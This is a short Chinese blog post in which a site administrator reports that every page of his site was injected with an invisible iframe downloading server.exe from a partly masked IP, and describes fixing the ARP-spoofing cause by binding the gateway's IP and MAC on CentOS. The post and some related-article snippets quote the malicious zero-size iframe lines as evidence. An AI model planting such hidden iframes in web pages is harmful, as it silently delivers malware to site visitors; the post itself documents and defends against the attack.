iframe server.exe病毒

最新推荐文章于 2022-05-23 09:57:32 发布
最新推荐文章于 2022-05-23 09:57:32 发布
阅读量713 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fool_frog/article/details/14453767
版权
今天网站被挂马了。。郁闷,打开所有的网页,均提示下载server.exe。查看网页源码,发现网页头部都有这么一行: 
<iframe src= http://59.xx.xx.xx:8080/server.exe width=0 height=0></iframe>

这个让我这个郁闷啊!查看了所有的配置文件和网站代码,没有发现任何可以文件。


上网搜了半天,说可能是局域网arp造成的。

于是乎,绑定网关ip和mac地址 搞定!

本人是centos系统,做如下操作:


$route      查看网关ip
$arp -a     查看网关IP对应mac地址
$vi /etc/ethers
输入 ip mac 
59.xx.xx.xx AA:BB:CC:DD:00 mac地址大写

最后:$arp -f

上述可能会存在问题,因为arp欺骗的话,你第一次arp -a查看的可能是欺骗的mac地址,不是真实的网关地址,那就先释放下清空下arp,然后再查看网关mac

fool_frog
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Laya和iframe通信.zip
11-23
在实际开发中,可能会遇到这样的情况:Laya游戏或应用需要获取iframe内网页的数据,或者需要控制iframe的行为,如加载特定页面、触发某些操作等。由于同源策略的限制,通常不能直接访问不同源的iframe内容,但可以...
photo.scr病毒清除工具.zip
08-20
今天早上访问网站发现不正常,登录服务器查看,代码都被加了<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>,并且每个文件夹下都有Photo.scr文件,用这个文件可以清除Photo.scr文件。
form窗口嵌入EXE
c02645的专栏
11-07 870
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.Runtime.InteropServic
Web前端如何启动本地可执行文件
s_156的博客
05-23 1504
如果在用户本地电脑上有个exe可执行文件,不能修改这个可执行文件本身,想在浏览器中通过点击按钮,调用这个exe文件,Web前端可以做到么? 由于浏览器的安全限制,是不允许直接调用exe文件的。但是有时候非要实现这种需求,因此只能用一些折中的方法。 方法1 注册表协议法 方法通用且简单,但是经过测试只有FireFox浏览器支持,Chrome浏览器禁用这个请求。 方法2 本地监听法 自己写一个小的服务端在本地一直监听请求。 方法3 IE有自己的调用方法 下面对每个方法分别进行介绍。 方法
网址嵌套为exe或者app应用
spring
03-26 404
方案一:nativefier 1.线上网址转成 exe 文件 安装nodejs 和 安装nativefier npm install nativefier -g 打包网站:nativefier --name "名字" "http://xxx.xx.xx.x" 2.直接发文件夹中exe使用或者发setup.exe程序给用户: 安装Inno setup :安装包exe 转成 setup.exe 程序 方案一:electron 1.线上网址转成 exe 文件 安..
Photo.scr病毒
liujiayu2的专栏
01-18 7892
Photo.scr病毒怎么清除和防范?有段时间笔者的win2003服务器上出现大量Photo.scr病毒,庆幸的是检查任务管理器后并没有发现可疑进程,说明病毒没有被执行。删除后没清静多少时间,这些病毒又冒出来了。这些Photo.scr的路径都在IIS自带FTP的路径下,关闭FTP服务就不再出现了,只要一开FTP过段时间又会出现。然后就认为黑客是利用了IIS自带的FTP漏洞上传的病毒文件,只要不用F
警惕恶性U盘病毒HDM.exe
weixin_34233679的博客
12-01 418
作者:清新阳光 ([url]http://hi.[/url]baidu.com/newcenturysun) 日期:2007/12/01 (转载请保留此声明) 这是一个恶性的U盘病毒,其破坏力巨大,主要表现在以下几个方面: 1.使用恢复SS...
某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq
Purpleendurer@CSDN
09-12 1920
某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmqendurer 原创2007-09-12 第1版2007-09-13 第2版 补充瑞星对 server.exe 的回复网页包含代码:/---<iframe src="hxxp://www.be**a**utyco**nce*pt.cn/a
layuiadmin-iframe3.zip
09-10
layuiadmin-iframe3.zip是一个包含layui框架的演示代码压缩包,专用于展示如何在Web应用中集成layui的iframe功能。layui是一款优秀的前端轻量级框架,以其简洁、强大的特性和丰富的UI组件,深受开发者喜爱。这个...
假冒TXPLATFORM.EXE 的U盘病毒
01-09
### 假冒TXPLATFORM.EXE的U盘病毒感染与查杀方法 #### 一、病毒简介 假冒TXPLATFORM.EXE的U盘病毒是一种常见的木马病毒,其主要通过U盘等移动存储设备进行传播。该病毒属于Trojan.Generic.Is.536802类别,能够在...
layui-iframe3.1.5.zip
11-30
2. `iframe.js`: layui的iframe扩展模块,包含了处理iframe的函数和方法。 3. `demo.html`: 示例页面,展示了如何在layui中使用iframe,以及如何配置和调用iframe模块。 4. `config.js`: 可能是配置文件,定义了...
让HTML网页变成一个exe执行程序(node-webkit)
热门推荐
Little Luck
01-19 3万+
1.使用HTMLRunExe 工具 但是当html网页包含html5内容,则会 是不是有所变形呢? 那是因为其框架只支持 ie8的页面预览属性 不支持 css3和html5 ? 解决办法1. <script src="js/html5shiv.js"></script> <script src="js/respond.min.js">&lt...
网页如何有效调用exe
weixin_30814223的博客
03-11 343
基于浏览器的应用,表现力始终不够丰富,我们常常会想,在一个网页中,点一下某个链接,能够直接调用安装好的可执行程序有多好啊。按照微软的推荐,应该是通过ActiveX,把可执行程序嵌入到网页中,例如flash的ActiveX。这样,我们就要购买ActiveX的签名,不通过签名的东西,在IE6中是无法加载的,为一个小项目购买ActiveX的签名,代价太昂贵了。另外,很多时候还要考虑如果用户突然...
【中科院1区】Matlab实现白冠鸡优化算法COOT-RF故障诊断算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
iframe.onload
11-30
iframe.onload是一个事件,当iframe加载完成后触发。可以通过注册事件监听器来执行一些操作。下面是两个例子: 1.正常的iframe加载完成后触发onload事件 ```javascript var iframe = document.createElement(...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值